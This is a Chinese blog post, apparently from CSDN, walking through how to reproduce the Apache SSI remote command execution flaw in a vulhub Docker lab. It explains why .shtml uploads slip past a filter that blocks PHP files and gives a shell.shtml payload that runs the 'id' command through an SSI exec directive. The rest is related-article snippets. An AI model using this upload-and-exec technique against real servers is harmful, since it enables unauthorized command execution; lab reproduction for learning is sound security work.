漏洞复现-Apache SSI 远程命令执行漏洞

已于 2023-03-29 09:46:34 修改
阅读量214 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: apache ubuntu docker Powered by 金山文档
于 2023-02-20 10:42:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53856000/article/details/129119679
版权

漏洞原理:Apache服务器在上传文件时,很多时候不允许上传php文件,如果Apache服务器开启了SSI与CGI支持,可以上传一个shtml文件,并利用<!--#exec cmd="id"> -->语法执行任意命令。

进入环境目录:cd vulhub-master/httpd/ssi-rce/

启动环境:docker-compose build docker-compose up -d

访问地址:复现漏洞的IP地址:8080/upload.php

没有.shtml文件的可以自己写入一个shell.shtml文件,内容写入:

<!--#exec cmd="id"> -->

上传.shtml文件:

访问查看:

复现成功!小伙伴们自行尝试吧~😊

全_世界
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache默认是不支持SSI如何给Apache增加SSI支持
09-15
SSI翻译成中文就是服务器端包含的意思,从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,下面给大家介绍下如何给Apache增加SSI支持
配置Apache支持shtml(SSI)的方法
09-15
主要介绍了配置Apache支持shtml(SSI)的方法,需要的朋友可以参考下
SSI.rar_Cortex-M0 SSI_SSI_SSI驱动_TI cortex-M4
09-14
TI CORTEX M3 SSI驱动8位数码管源程序
Apache SSI 远程命令执行漏洞
qtttgeq的博客
04-20 342
接上一篇文章。
07 - vulhub - Apache SSI 远程命令执行漏洞,从青铜到王者的路线
最新发布
2301_76223496的博客
03-23 807
当目标服务端存在不允许上传php后缀的文件时,但是同时又开启了SSI与CGI支持,攻击者就可以上传一个shtml文件,并利用 语法执行任意命令。因为 SSI 支持从 HTML 的注释行中读取命令执行,所以当 HTML 注释行中存在恶意的代码时,就会造成远程命令执行漏洞复现
Apache SSI远程命令执行漏洞
qq_43665434的博客
05-10 864
Apache SSI远程命令执行漏洞 实验环境 主机 角色 IP centos8 漏洞靶机 192.168.1.80 windows10 攻击主机 192.168.1.120 实验过程 启动centos8主机 # 开启docker服务 service docker start # 进入vulhub目录 cd /usr/sbin/vulhub/httpd/ssi-rce/ # 创建镜像 docker-compose build # 启动镜像 docker-compose u
[Apache SSI远程命令执行漏洞]
m0_71635484的博客
02-20 332
Apache SSI远程命令执行漏洞
07 - vulhub - Apache SSI 远程命令执行漏洞
利他者利己,利己者无功。利他利己,利己利他。
10-15 1183
SSI简介: 漏洞复现之前,要知道SSI是什么,那么SSI是什么呢? SSI----即server-side includes SSI功能: SSI提供了一种对现有HTML文档增加动态内容的方法,不需要编写复杂的JSP/PHP/ASP等程序或者调用CGI程序。 SSI用法: SSI的语法格式类似HTML的注释,因此正确启用SSI之后,浏览器可以忽略他但是源码仍然可见,服务器会对特定的SSI指令解析,从而实现少量动态内容的添加。
imx-ssi.rar_SOC_imx6q-ssi
09-24
imx-ssi.c ALSA Soc Audio Layer.
webpack-ssi-include-loader:废弃寻找 SSI 的 html 内容包括模板字符串,
05-29
Webpack SSI 包含加载器 描述 这个包的创建是为了帮助那些必须使用 SSI 和 webpack 的开发人员。 它将有助于设置开发... yarn add webpack-ssi-include-loader module : { rules : [ ... . { test : / \. html?
Apache SSI 远程命令执行漏洞复现
weixin_52458793的博客
02-20 204
漏洞复现
Apache RocketMQ 远程命令执行漏洞(CVE-2023-33246)vulhub漏洞复现
qq_53003652的博客
07-12 633
在其5.1.0版本及以前存在一处命令执行漏洞,攻击者通过向其更新配置相关的功能发送指令即可更新任意配置项,并通过配置项中存在的命令注入功能执行任意命令。在192.168.126.128开启nc启动监听,运行该poc。Apache RocketMQ是一个分布式消息平台。创建hacker文件成功。使用IDEA新建一个。
中间件漏洞 | Apache-SSI/任意命令执行
weixin_52116519的博客
11-05 545
Apache SSI 远程命令执行漏洞在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用
CVE-2017-15715漏洞SSI-RCE漏洞
07-27
SSI-RCE漏洞是一种服务器端包含(SSI漏洞,可能导致远程命令执行SSI是一种服务器端处理动态内容的技术,它允许将外部文件包含到网页中。如果服务器未正确配置和过滤用户提供的输入,攻击者可以通过注入恶意代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值